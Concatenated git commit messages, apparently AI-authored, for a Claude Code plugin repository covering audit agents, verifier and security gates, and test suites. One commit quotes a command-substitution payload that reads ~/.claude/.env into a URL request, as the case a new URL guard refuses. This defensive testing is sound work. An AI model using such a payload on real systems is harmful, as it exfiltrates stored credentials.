Fresh-opus whole-chantier ronde (17fbe51..HEAD, EVAL-023 style): axes
severed-wires / gate-regressions / fail-open PROVEN CLEAN (all 7 new
handoffs traced end-to-end both sides). Fixed: init 5b now dispatches the
FULL-AUDIT path (auto-mode gated a missing README as SIGNIFICANT →
[CREATE-AUTO] unconditional restored, sole greenfield README path);
census locks added for /geo ERROR CONTRACT + never-re-derive (deleting
the fail-closed handler would have stayed green), doc-audit
model=opus override x5 flows, SYNTH REPORT grammar; doc-syncer ex-STEP-8
prose repointed to the dispatcher gate; plugin-advisor anim rows read
the PROBE REPORT ANIM field (no Bash anymore); client-handover 9.7
cleans the transient draft. Census caught one more line-wrapped lock
before it shipped vacuous. 133 pass / 0 fail, make test exit 0.
seo-analyzer + geo-analyzer gain MODE: collect|judge|template around the
dispatcher (mode-based, zero body-text moves — seo-data fetch-wiring
locks survive; opus pin kept = fail-safe direction, a forgotten override
over-tiers but never downgrades judgment). Run-scoped gitignored
signals handoff (.audit/*-signals-<RUNID>.md + COLLECTION COMPLETE
sentinel), judge fails closed on absent/mismatched/unsealed signals.
/seo rewired to 3 phases (domains parallel per phase) + DISPATCHER ERROR
CONTRACT (mute/ERROR judge never carried into templating; retry once,
escalate); /geo same single-domain; legacy no-MODE single-shot kept on
the opus pin for /harden narrow-scope + /onboard report-only. Dropped
/geo's 'ask and I relay' fiction (dispatched agents cannot ask).
In-wave smokes PASSED disk-verified: collect signals+sentinel; judge
ERROR-verdict on wrong RUNID; real judge = honest N/A + deterministic
engine + full scoring grammar; template = complete envelope + verbatim
sentinel + zero re-derivation. Census §18 (125 pass — one vacuous
line-wrapped lock caught by the census itself and fixed), make test
exit 0.
handover-doc-writer: MODE synthesize (model="opus" call-site — STEP
9/10/12 → .audit/handover-draft-<RUNID>.md + DRAFT COMPLETE sentinel) /
MODE render (sonnet pin — STEP 13-16 from the draft, fail-closed on
absent/mismatched RUNID). Mode-based, not a file split: the §9
name+dispatch census locks survive untouched. client-handover-writer 9.6
dispatches twice with the FULL PACKAGE both times (LRN-126) + RUNID mint
+ post-run draft cleanup. In-wave smokes PASSED disk-verified: draft
written+sentinel+gitignored; render BLOCKED on wrong RUNID (no phantom
synthesis); render consumed draft + honored skip-write, report grammar
intact. Census §17 (111 pass), make test exit 0.
Reverses the BDR-066 rejected alternative (opus pins on audit agents):
session default is now Fable, so inherit burned Fable quota on every
dispatched audit/challenge. analyzer, plan-challenger, seo/geo/
validator-analyzer pinned model: opus; onboard's 6 general-purpose
audit dispatches carry model="opus"; tour Phase B repointed.
interviewer + client-handover-writer stay unpinned (inline-load only,
a pin there is inert). settings.json default: claude-fable-5[1m].
Census flipped: model-routing §3 + new §11 (61 pass), loops-light 35,
full make test green.
STEP 1.8 (Option B): skip purely cosmetic fixes (CSS/copy/typo), run the 3-lens
challenge only when the fix touches control flow/behaviour (off-by-one, wrong
operator, behaviour-changing config, execution-altering import); a BLOCKER means
it was never a hotfix -> escalate to /bugfix. 12th orchestrator wired.
- skills/hotfix/SKILL.md — STEP 1.8 guarded challenge
- lib/tests/plan-challenger.test.sh — lock hotfix into the census (43 assertions)
After a plan/reflection is elaborated and before it executes, three fresh blind
sub-agents (correctness / robustness / simplicity) attack it on the big model;
the main loop RE-THINKS every aspect a BLOCKER lands (a named plan change, or
[deferred]) and re-challenges once if the plan materially changed. Advisory into
each skill's existing human gate — the human stays the decider.
- lib/challenge-plan.md — reusable phase: fail-safe (never fail open),
severity-driven (any single-lens BLOCKER = must-address), RE-THINK loop
- agents/plan-challenger.md — challenger role (read-only, big-model per BDR-066)
- lib/tests/plan-challenger.test.sh — 41-assertion structure lock
- wired into 11 orchestrators: ship-feature/init-project/feat/bugfix (build-plan),
onboard/audit-delta/code-clean (proposals), seo/geo/harden/web-validate (fix-bundle)
Hardened by dogfooding: 3 blind challengers reviewed this feature's own v1 plan
and caught 4 BLOCKERs (fail-open, consensus-buries-lone-finding, wrong model
tier vs BDR-066, false on-disk-plan premise) — all fixed here.
Full removal per user request: the PreToolUse hook that blocked model
Edit/Write on quality-gate files (settings.json, gitflow.sh, .githooks,
doctor.sh, hooks, lib/tests, lint configs) plus its one-shot sentinel.
- delete hooks/config-protection.sh
- delete lib/tests/config-protection.test.sh
- deregister the hook from settings.json (rtk-rewrite PreToolUse kept)
- drop the README mention
Residual protection unchanged: gitflow pre-commit guard + Gitea branch
protection still block direct code commits to main/develop.
Surfaced by dogfooding on a real Astro repo instead of reading the spec.
Claude Code installs a shell function routing `grep` to ugrep with
`--ignore-files`, so grep honours .gitignore and never descends into a
gitignored dist/. `find` honours nothing. seo-analyzer uses both.
Measured on zenquality (Astro, dist/ gitignored but built locally),
seo-analyzer.md:497 returned 92 images, 45 of them under dist/ — every asset
listed twice, source and generated copy, byte-identical. Two live
consequences:
- "top 20 by size" was ~10 real images dressed as 20.
- Batch C (`cwebp -q 80 <img> -o <img>.webp`) could target dist/og-image.png;
the .webp lands in dist/ and the `npm run build` the dispatcher runs to
VERIFY the fix erases it. Fix lands, verification passes, nothing survives,
report says applied.
lib/source-scope.sh separates source from build output, framework-aware.
`public/` is deliberately NOT excluded by default: it is Astro/Vite/Next
SOURCE and holds favicon.ico, apple-touch-icon.png and robots.txt — the very
files STEP 4 curls. It is build output only for Hugo/Gatsby, detected from
config (legacy config.toml alone is ambiguous, so it needs archetypes/ too).
Blanket-excluding it would blind the audit to its own resource checks.
findargs emits one token per line and MUST be consumed via a quoted array.
I shipped a flat-string version first and the dogfood caught it: the shell
globs */dist/* against the CWD and passes the matches to find as search
paths, which turned 90 hits into 135 and kept every dist/ file. Both the
header and a functional test now pin that.
Also: no bundle item may target build output, in either agent. That is the
real safety net — even if some future find leaks a dist path, the fix cannot
land there. Fix the source that generates the artifact; if the source cannot
be found, that is a finding, not a reason to patch the artifact.
SCOPE CORRECTION: the proposal claimed grep was auditing 86 generated files
instead of 9 templates. That was FALSE — the ugrep shim already skips them.
Killed my own premise before coding it; the real bug is narrower and lives in
find only. Do NOT "fix" the grep lines to match: they are already correct,
and adding these exclusions there would drop public/.
Verified: 90 -> 45 images on the real repo, 0 dist survivors, public/
preserved (favicon.ico still visible); 34 new assertions PASS / 0 FAIL; full
suite green; shellcheck clean. Test file addition used the documented
one-shot config-edit sentinel.
Prerequisite for C1, which is why this moved up from AXE 5. Today $DOMAIN is
typed by the operator and interpolated into ~10 curls (seo-analyzer.md:254+,
geo-analyzer.md:248+) — self-inflicted risk. The sitemap crawl changes the
threat model completely: URLs then come from the TARGET'S OWN SERVER, so a
remote file's bytes reach a shell.
The severe hazard is injection, not SSRF. Those curls quote with ", inside
which $ and backtick still execute, and ~/.claude/.env holds
GOOGLE_OAUTH_CLIENT_SECRET + CRUX_API_KEY. A <loc> of
`https://x/$(cat ${HOME}/.claude/.env)` reads the vault into a request. The
test suite asserts exactly that payload is refused.
Code, not prose: a markdown instruction does not stop an injection. Mirrors
the house pattern (fetch.sh:25 _label_safe) — whole-string allowlist, C
locale, POSIX case: newline-proof, locale-independent, no grep pitfall.
Allowlist over denylist per CLAUDE.md.
Covers: shell metacharacters; scheme (http/https only — no file:, gopher:);
literal loopback/private/link-local/metadata/.local; userinfo authority
confusion (https://trusted.com@127.0.0.1/ hits .0.0.1, not trusted.com).
NOT covered, stated in the header rather than left silent: DNS-level SSRF. A
public hostname resolving to a private address passes. Closing it needs
resolve-then-pin at the HTTP layer; shell curl cannot without a TOCTOU
window. Proportionate to the threat model — this runs on a workstation
auditing the operator's own client sites.
Wired at all three entry points: both agents' STEP 4 domain assignment, and
the W3 sameAs loop (whose URLs come from the audited repo, not the operator).
Refused sameAs rows report as REFUSED rather than vanish — neither dead nor
live, and an unguardable sameAs is itself a finding.
Note: writing the test file tripped the config-protection hook (test suite is
a guarded quality-gate). Used the documented one-shot sentinel with a reason
rather than working around the gate; it was consumed as designed.
Verified: 47 new assertions PASS / 0 FAIL, picked up by make test; full suite
green; shellcheck clean on lib/url-guard.sh (the sole remaining hit in the
health-stack glob is pre-existing, lib/gitflow-test.sh:242); guard dogfooded
against the real zenquality.fr domain (accepted) and the real exfil payload
(refused, exit 2).
Reroute hotfix's deeper-bug escalation to the /bugfix skill (bugfixer is now a
pure executor, not loadable standalone). loops-light locks repointed to the
bugfix orchestrator + bugfixer-executor shape.
lib/tests/run-review-guards.sh — 5 whole-surface guards that RED if a banned
pattern subsists anywhere, auto-run by make test (run-*.sh glob):
G1 trailer (A1), G2 false CLAUDE.md attribution (A5), G3 strict-YAML frontmatter
(A4), G4 reconcile hermeticity (job3 B1), G5 hook-drift installed==emit (A2).
This is the check that would have caught A1/A4/A5/A2 at make-test time instead of
an adversarial review — the series' recurring failure was fixing one instance and
leaving twins. G3/G5 degrade to SKIP if pyyaml/emit-hook absent (portability).
Teeth verified: a planted trailer in a real agent REDs G1. Review fil rouge.
Any single-pipeline printenv/env dump now gets a redaction pipe appended
before it can reach stdout/transcript; `env VAR=x cmd` (legitimate
subprocess launch) is left intact. Compound commands (;, &, ||) bail
untouched — appending the pipe at the end would attach to the wrong
segment.
Discovered mid-implementation: rtk rewrite classifies any command
containing "env" as exit-code 2 ("deny"), with no settings.json rule
backing it — the command still reaches native evaluation and can run.
Adjusted case 2/1 handling so the redaction check runs regardless.
lib/deploy-commit.sh: a rejected `git commit` (pre-commit hook,
protected branch, signing failure) now exits 6 (loud stderr, distinct
from rc 1's "nothing to do") instead of sharing rc 1 with the no-op
cases. Header comment documents the full 0/1/2/3/4/5/6 taxonomy.
Closes J4-22 (UNTESTABLE): at client repos, a failed deploy-state
commit was indistinguishable BY EXIT CODE from "nothing to do" (rc 1
was shared 3 ways); exit-code-only callers couldn't disambiguate
(stderr-parsing callers already could).
Caller census (per report's explicit gate): skills/deploy/SKILL.md
documents and parses this exit-code contract in TWO places (bootstrap
commit + incident-recovery commit). Flagged to the user before
committing; confirmed GO to add rc 6 there too (additive — no existing
code's meaning changes) so the documented contract stays accurate for
live deploy runs.
New T10 in lib/tests/deploy-commit.test.sh (+3 assertions, 13→16):
rejecting pre-commit hook sandbox — asserts rc 6, empty stdout (no
stale hash), HEAD unmoved.
GREEN: full `make test` exit 0 (deploy-commit 16/16 incl. T10).
shellcheck clean, bash -n clean.
install-plugins.sh: mktemp failure building CFG_SNAPSHOT now aborts
the install loudly (err + exit 1) instead of warning and continuing
UNGUARDED — a failed guard used to mean CLAUDE.md/.claude/settings.json/
settings.json could be silently rewritten by graphify's installer for
the rest of that run. Closes §3.4.
Added T5 to lib/tests/curated-config-guard.test.sh: extracts the
WIDER header block (GUARDED_CONFIGS through the closing `fi` — the
fail-closed logic lives in the top-level if/else, outside
restore_curated_configs(), so it needs its own awk range) in a
subshell with a stubbed `mktemp` forced to fail; asserts exit 1 and a
loud "mktemp failed" message. +2 assertions (4→6).
Verified: bash -n clean, shellcheck clean (both files), full `make
test` exit 0.
New lib/tests/toggle-external-repo-resolution.test.sh: sandbox
replicating the real ~/.claude/lib -> <repo>/lib symlink layout,
invokes toggle-external.sh THROUGH the symlinked path and asks
`status emil-design-eng` (marked enabled in the physical repo tree).
Demonstrates J4-20 (UNTESTABLE + latent bug) against the CURRENT code,
on purpose — this commit is RED: reports "missing" instead of
"enabled", because toggle-external.sh:34's logical `cd` (no -P)
resolves REPO to the symlink's logical parent instead of the physical
repo root, so SKILLS_DIR/DISABLED_DIR point at the wrong tree. Same
BLK-006 bug class as profile.sh's historical breaks, un-ported here —
latent today (no in-repo caller hits direct `~/.claude/lib/...`
invocation), but reachable.
This intentionally reds `make test`. Next commit fixes it.
New T8 in lib/tests/run-deterministic.sh: pre-commit hook that always
rejects (exit 1), then attempts a memory-commit. Demonstrates J4-04
(UNTESTABLE, consequence CRITICAL) against the CURRENT code, on
purpose — this commit is RED: rc=0 (expected 5), stdout leaks the
stale (unchanged) HEAD hash instead of staying empty. `set -uo
pipefail` (no -e) means a rejected `git commit` doesn't stop the
function — it falls through to `git rev-parse --short HEAD`, which
prints the PREVIOUS HEAD and succeeds, so the caller sees what looks
like a valid hash for a commit that never happened. HEAD itself is
correctly unmoved (git did block it) — only the reporting is masked.
This intentionally reds `make test` (memory-commit.sh not yet fixed).
Next commit fixes it.
New T18-T20 in lib/tests/config-protection.test.sh (+4 assertions,
20→24). T18 Write payload, T19 MultiEdit payload → both exit 2 (pass
trivially today — the extraction is tool-name-agnostic — but lock
against a future narrowing to Edit-only; stated honestly, per report).
T20 sentinel containing ONLY whitespace bytes (" \n\t", not literally
empty) → exit 2 AND consumed — exercises config-protection.sh:44-46's
`grep -q '[^[:space:]]'` check specifically, which the pre-existing
T17 (zero-byte file) doesn't reach. Closes J4-07 (WEAK): every payload
in this suite said "Edit", so a future Edit-only narrowing (or a
weaker sentinel-emptiness check) would have failed open with no red.
DOUBLY GATED per report §3.5 (edits config-protection's own test) +
user's stated exception (STOP and show the exact draft before writing,
even though the formal AUTHORIZATION line said AUTHORIZED) — drafted
inline, user confirmed "proceed as drafted" before the sentinel/edit.
Mutations (lean scratch copy — only hooks/config-protection.sh + this
test file, not the whole repo/.git), one at a time, each reverted
before the next:
- T18/T19: gated the file_path extraction on `tool_name == "Edit"`
(python3 tool_name check + if/else) → both red alone, everything
else (incl. T1-T17) unaffected.
- T20: swapped the whitespace-aware `grep -q '[^[:space:]]'` for
`[ -n "$reason" ]` (byte-count only) → T20 reds alone; T17 (the
zero-byte case) stays green either way, confirming T20 tests
something T17 structurally cannot.
GREEN: real repo unmutated, 24/24 passed, shellcheck clean.
New S11-S13 in lib/tests/run-doc-shape.sh (+4 assertions, 19→23) +
truncate_last_n() helper (removes exactly N lines from the END of a
committed file — pure removal, 0 added lines, no heading, so the
ADDED-envelope and heading checks at doc-shape.sh:70/78 can't fire
first). Baseline = 40 plain committed lines, then truncated. S11
remove exactly 20 (== default DOC_SHAPE_MAX_REMOVED, `-gt` boundary)
→ within (0). S12 remove 30 → exceeds (1), stderr names the path. S13
DOC_SHAPE_MAX_REMOVED=5 override + 6-line removal → exceeds (1).
Closes J4-08 (WEAK): the REMOVED branch was never driven over
threshold by any existing case (S4 only removes 2 lines) — a
regression here mislabels a large doc deletion MINOR and doc-syncer's
auto-commit flow would swallow it silently (the exact RISK-1 BDR-040's
oracle exists for).
Mutation (lean scratch copy — only doc-shape.sh + run-doc-shape.sh,
not the whole repo/.git): changed `-gt "$DOC_SHAPE_MAX_REMOVED"` to
`-gt 2000` (doc-shape.sh:82). RED: S12 fails both assertions (30
removed no longer exceeds) and S13 fails (the hardcoded literal also
kills the env-override contract — DOC_SHAPE_MAX_REMOVED=5 no longer
has any effect). S11 stays green (20 removed was always within,
mutation-invariant). 3/3 reds land exactly where expected.
GREEN: real repo unmutated, 23/23 passed, shellcheck clean.
New lib/tests/curated-config-guard.test.sh (+4 assertions). Extracts
restore_curated_configs() from install-plugins.sh AT TEST RUNTIME via
awk '/^restore_curated_configs\(\) \{/,\/^\}/' (verified single-
occurrence, column-0 closing brace) so drift in the real script
propagates into the test instead of testing a frozen copy. Harness
defines GUARDED_CONFIGS/CFG_SNAPSHOT/REPO/info() itself (the array
literal at install-plugins.sh:41 is outside the extracted range).
Sandbox REPO with the 3 fake guarded files + a pre-populated
CFG_SNAPSHOT; mutates CLAUDE.md only (simulated installer drift);
asserts: mutated file restored byte-identical (cmp -s), the other two
guarded files' content unchanged (not touched by the restore loop),
snapshot dir removed. Closes J4-03 (CRITICAL): the guard against
graphify's installer clobbering CLAUDE.md/settings.json had zero test
coverage.
Mutation (copy of install-plugins.sh, lean scratch — only that one
file, not the whole repo/.git): inverted the cmp condition
(`! cmp -s` → `cmp -s`) at the line the report names. RED: T1 fails
(the mutated file no longer gets restored — the inverted condition
only copies when already identical, a no-op, and skips restoration
exactly when it's needed). T2/T3/T4 stay green, confirming the
mutation is localized to the restore path.
GREEN: real repo unmutated, PASS=4 FAIL=0, shellcheck clean.
Deleted T4e + its coupled echo note in lib/tests/run-reconcile.sh and
the fixtures/real-state.snapshot it read — superseded by SPEC-08's T7,
which actually DRIVES the tree_clean/pushed/msg_committed oracles
instead of miming them via a static line-count regex. Closes J4-09
(WEAK+drift): T4e only counted fixture line-suffixes matching
`=(true|resolved|present)$`; the snapshot itself was stale
(BLK-009=open contradicted blockers-snapshot.md's already-resolved
status) and unowned, and the drift was inert (`=open` doesn't even
match the count regex) — the assertion could never have caught
anything.
Updated skills/reconcile/SKILL.md:53's hardcoded "20/20" claim to the
new total (unguarded file, same logical step, ordered after SPEC-08+
SPEC-10 per the report).
grep -c 'real-state.snapshot' lib/tests/run-reconcile.sh == 0
(verified). No red demo (deletion, per spec) — gate is the green run
+ that grep. GREEN: 25/25 passed, shellcheck clean.
New lib/tests/fixtures/decisions-snapshot.md (neutral name, LRN-077
style): carries a --help token (so reconcile_contradiction_candidates
still surfaces the BDR-001 ⇄ --help-chantier candidate against
todo-snapshot.md), a "one-line ticket" line, and representative
OUT-OF-SCOPE/DEFERRED/follow-up context. T3 and T5 in run-reconcile.sh
now read this fixture instead of the LIVE $MEM/decisions.md; deleted
the $MEM variable definition and its stale comment. Closes J4-10
(FIXTURE-DRIFT): T3/T5 were the last live-registry reads in this
suite (T2 was fixed in job3-B1) — any legitimate prune/reword of the
real decisions.md would have reded the suite for a reason unrelated
to the reconcile engine itself.
grep -c '$MEM' lib/tests/run-reconcile.sh == 0 (verified).
GREEN: real repo, 26/26 passed (all 4 T3 markers + T5 candidate found
via the fixture).
Red demo (per spec — no code mutation, this is a fixture-substitution
spec): lean scratch copy, pointed T3's decisions-arg at /dev/null
transiently → "one-line ticket" (the only marker living solely in the
decisions-side fixture, not in todo-snapshot.md) goes missing, RED;
the other 3 markers stay green (satisfied by todo-snapshot.md alone).
Proves the assertions actually read the fixture rather than passing
vacuously.
New T7 block in lib/tests/run-reconcile.sh (+6 assertions, 20→26):
a throwaway git repo under mktemp with a LOCAL BARE origin drives the
3 previously-unexercised oracles live: tree_clean (dirty→rc≠0, clean→
rc0), pushed (pushed to origin FIRST so origin/main exists — else
rev-list is vacuously empty — then rc0 when synced, rc≠0 once 1 ahead),
msg_committed (rc0 for a present commit message, rc≠0 for an absent
one). Closes J4-12 (DEGRADED, prerequisite of SPEC-09/10): these 3
oracles backed report-only /reconcile output with zero test coverage —
a silent inversion would mis-report open-work state.
Mutation (lean scratch copy — only lib/reconcile.sh + lib/tests/
run-reconcile.sh + its fixtures + .claude/memory/decisions.md, not the
whole repo/.git, per the /tmp-exhaustion lesson from SPEC-01/02/04):
inverted tree_clean's rc (`-z` → `-n` on the porcelain-status check;
the report's literal "--quiet → negated" wording doesn't match this
function's actual `[ -z ... ]` shape, so applied the equivalent
semantic inversion). RED: both T7a assertions fail (dirty reads as
clean and vice versa); T7b/T7c stay green, confirming the mutation is
localized. (T6a/b/c red in the lean copy too, expected — no real git
history / skills dir there — unrelated to the mutation.)
GREEN: real repo unmutated, 26/26 passed (T7 included).
skills/reconcile/SKILL.md:53 claimed "20/20, shellcheck clean" but the
suite read .claude/memory/blockers.md live, so closing BLK-009
(d1e7423) turned T2b/T2c red for a correct reason unrelated to the
engine. Froze a post-BLK-009 snapshot (lib/tests/fixtures/
blockers-snapshot.md) and pointed T2 at it instead of the live file —
same approach the other T1/T3/T4 fixtures already use. Updated T2b/T2c
expectations to match (BLK-009 resolved, open = {001,003}). Suite is
back to 20/20 GREEN, shellcheck clean, matching the skill's own claim.
ship-feature: STEP 0e CONTRACT (request verbatim) → ENRICHED at the STEP 3
validation gate (design criteria appended [gated <date>], the human
micro-gate) → STEP 5 VERIFY+SECURE judges the branch against the ENRICHED
contract via the shared include. Distinct axis from STEP 6 code review, both
run (LRN-095).
init-project: contract seeded from the PROJECT BRIEF (V1 features → criteria)
→ ENRICHED at VALIDATION GATE #1 → STEP 9 VERIFY+SECURE. Adds the security
gate init-project previously lacked (was deferred to a later /onboard).
onboard: explicit NO verify-loop — it produces an audit report, not a change
to verify against a request; contract is scope-only, security-auditor runs
MODE audit (report-only), never a gate. Documented to prevent a misplaced
symmetry loop (BDR-050: dev pipeline != audit).
lib/tests/no-vacuous-locks.test.sh: deterministic backstop for LRN-093 (2nd
recurrence in this chantier → the advisory alone did not hold). Refuses a
literal \n in any grep/tf/tr_/tn pattern across lib/tests/*.test.sh;
flip-tested against a synthetic offender so the guard proves it bites.
lib/tests/loops-heavy.test.sh: 18 structure locks green.
Behavioral dogfood (both vigilance points, real): (1) enrichment — a fresh
verifier reads and checks a [gated] design criterion (ECARTS naming it
precisely); (2) escalation — 3 consecutive ECARTS on the same criterion →
orchestrator STOPs at the max-3 bound + presents the CONTRACT-vs-REALIZED
table, no 4th loop, no commit. First real exercise of the infinite-loop guard.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01XpphkdTosUzokBDNG7PToS
lib/verify-secure-loop.md: shared main-loop include. GATE 1 fresh verifier
(blind, contract from disk) → CONFORME straight to GATE 2, ECARTS loop max
3; GATE 2 fresh security-auditor (MODE gate) → PASS to commit, BLOCK loop
max 3 with re-verify-request-FIRST order invariant. Mute agent never a PASS.
feater.md: STEP 0.7 CONTRACT (proportional, silent on a clear feature) +
STEP 3 VERIFY+SECURE via the include. Nominal = one verifier + one security
dispatch; the loop only costs when it loops.
bugfixer.md: STEP 3.5 CONTRACT fed by the DIAGNOSIS (bug report verbatim +
reproduced-then-gone + regression test criteria) + STEP 5 fresh gates via
the include. Renumbered STEP 5 sub-steps (gates before the commit gate).
hotfixer.md: STEP 1.7 CONTRACT (silent autofill, zero questions) + STEP 3
security gate whose FAILURE REVERTS (git restore to pre-flight SHA + escalate
to /bugfix), never loops — the 1-attempt model preserved. No fresh verifier
at hotfix weight (the smoke-check verifies the trivial contract). Adds the
Agent tool to hotfixer.md + hotfix/SKILL.md for the security dispatch.
lib/tests/loops-light.test.sh: 27 structure locks green, shellcheck clean.
Behavioral pipeline dogfood on a fixture (feat adding a feature WITH a SQLi):
GATE1 CONFORME (feature present, SQLi not a conformity gap — orthogonal
gates) → GATE2 BLOCK(1) (checklist caught the %-interp SQLi semgrep's taint
rules missed) → [fix to parameterized] → re-verify CONFORME (order invariant,
feature intact) → re-scan PASS. Loop converges to green.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01XpphkdTosUzokBDNG7PToS
agents/security-auditor.md: fresh read-only-on-code SAST gate. Pinned
rulesets p/security-audit + p/secrets + p/owasp-top-ten (owasp REQUIRED —
measured: the 2-ruleset baseline misses SQLi + path-traversal entirely on
realistic Flask code), never --config auto, never auto login (BDR-048).
Severity map: secrets ERROR → CRITICAL, other ERROR → HIGH (block),
WARNING/INFO → reported. gate mode (diff, no Write) vs audit mode (Write
only to REPORT, rule-locked). DEGRADED (semgrep absent) still runs the
checklist and still blocks — never a vacuous pass (LRN-048). Anti-gaming:
a new un-gated nosemgrep suppression is BLOCKING. PROOF mandatory, mute
auditor never a PASS, blind (no iteration history), blocks HIGH/CRITICAL
only (LRN-047).
Grafts: onboard STEP 6 L3a dispatches it in audit mode (report
.onboard-audit/semgrep.md) in BOTH gstack branches — complement to cso
(cso is a gstack submodule, unmodifiable); synthesis picks it up via the
existing .onboard-audit/ sweep. audit-delta security axis runs the SAST
pass first, folds findings into the existing gate/fix/re-verify flow.
lib/tests/security-auditor.test.sh: 28 structure locks green, shellcheck
clean. Behavioral dogfood (fresh agents on a planted fixture):
BLOCK(9) on the vuln commit (2 secrets→CRITICAL, semgrep+checklist
complementarity — checklist caught the 6 semgrep missed off-context);
BLOCK(1) on a new nosemgrep suppression (understood semgrep's 0 was the
mask); DEGRADED → BLOCK(7) on grep-detectable secrets with semgrep hidden.
FP measured on real repos (faunosteo, game): owasp adds only hygiene
findings, contained by diff-scoping.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01XpphkdTosUzokBDNG7PToS
lib/contract-interview.md: mandatory upstream passage for all orchestrators.
Verbatim REQUEST (immutable), proportional questions (complete request =
zero, max 3 one batch), testable criteria + file scope, written to disk
immediately (.claude/tasks/contracts/<date>-<slug>-<HHMM>.md — a context-only
contract dies at compaction). Lifecycle: enrichment only at human gates
([gated] marker, scope micro-gate), supersedes for re-scope, aborted runs
deleted or committed status:aborted — never left dirty. Hand-off = path,
not restatement.
agents/verifier.md: fresh read-only verifier. Reads the contract from disk,
renders VERIFY — VERDICT: CONFORME | ECARTS(n) | ERROR. Blind: never
receives iteration history. PROOF line mandatory (LRN-048), UNVERIFIABLE
never MET, mute verifier never a PASS (retry once fresh, 2nd structural
failure = human escalation). Orchestrator protocol documented in-file
(max 3 iterations, re-verify request before security).
lib/tests/contract-verifier.test.sh: 31 deterministic structure locks on
the load-bearing doctrine clauses — green, shellcheck clean.
Behavioral dogfood (2 fresh subagents on a planted fixture): gap case →
ECARTS(2) exactly as planted (NOT-MET located + out-of-scope flagged);
conform case with injected fake iteration history → CONFORME, noise
ignored, real python spot-check as evidence. Both outputs parse-clean.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01XpphkdTosUzokBDNG7PToS
The 07-02 tightening left bare tokens common in non-UI talk (design, component, theme, transition, frontend, palette) -> ~6 false-fires/session during the ECC config audit. Dropped them; dashboard now word-boundary matched (kills the ecc_dashboard.py filename match, keeps 'admin dashboard'); kept animation; added 'front-end design' bigram. Each fire now logs time+token+excerpt to a light file so 're-firing?' is measured, not argued. Regression test 18/18, shellcheck clean.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01XpphkdTosUzokBDNG7PToS
Blocks Edit/Write to guardrails (settings.json + .claude/settings*, lib/gitflow.sh, .githooks/*, doctor.sh, hooks/*.sh self-guard, lib/tests/*, lint) so a gate can't be weakened to pass an error. Bypass = one-shot sentinel .claude/.config-edit-ok (non-empty reason, logged+consumed), not an env-var. Adaptation from the ECC second-look (BDR-047 corrob): own bash idiom, not ECC's Node dispatcher. shellcheck clean, test 20/20.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01XpphkdTosUzokBDNG7PToS
$MEM/../skills resolved to .claude/skills/ (the LRN-042 parasite, removed
2026-06-30 by make plugin Step 8.5), not the real skills/. Green at build
time only because the parasite still existed — green-for-wrong-reason
(LRN-077 class); red ever since. Suite back to 20/20.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016zA3Qh2Q1QpcGXzXxKeDHR
/release-candidate cuts a release by orchestrating the existing gitflow
release mechanic (start from develop; finish fan-out main+develop+delete)
and adding the one piece the lib lacks: the version tag.
- skills/release-candidate/SKILL.md: thin orchestrator — preconditions →
gitflow start release → prep (version.txt + CHANGELOG, breaking doc'd) →
run-tests gate → human WHEN-to-release gate → gitflow finish → git tag -a
vX.Y.Z (in the skill, lib untouched) → push (gated).
- lib/tests/run-release-candidate.sh: throwaway-repo flow replay. RC_TAG=0
reds the tag (gitflow fans out but never tags); RC_TAG=1 → 5/5.
- CLAUDE.md: Skill routing line. CHANGELOG [Unreleased]: /reconcile +
/release-candidate under Added (so the eventual v4.0.0 captures them).
Tag scheme vX.Y.Z continues the version.txt/CHANGELOG lineage. writing-skills TDD.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01C6bUdvHnajCNzgVQefZowj
/reconcile confronts declarative sources (TODO checkboxes, registry
statuses, ## Index) against real git/fs state and surfaces the gaps,
in 4 categories + contradiction candidates.
- lib/reconcile.sh: engine — body-only enumeration (never the Index),
git/fs oracles, BLK last-block-wins status, lexical deferral sweep,
contradiction candidates, pure reconcile_verdict kernel.
- lib/tests/run-reconcile.sh + fixtures (neutral-named): 20/20;
recursive-coherence T1 reds if the engine reads the Index (teeth).
- skills/reconcile/SKILL.md: thin orchestration + A/B/C write-back gate,
honest limits (lexical deferrals, contradictions surfaced not asserted).
- CLAUDE.md: Skill routing line.
Founding principle: never trust a declarative source as an oracle — the
skill practices what it preaches (tested). Built via writing-skills TDD.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01C6bUdvHnajCNzgVQefZowj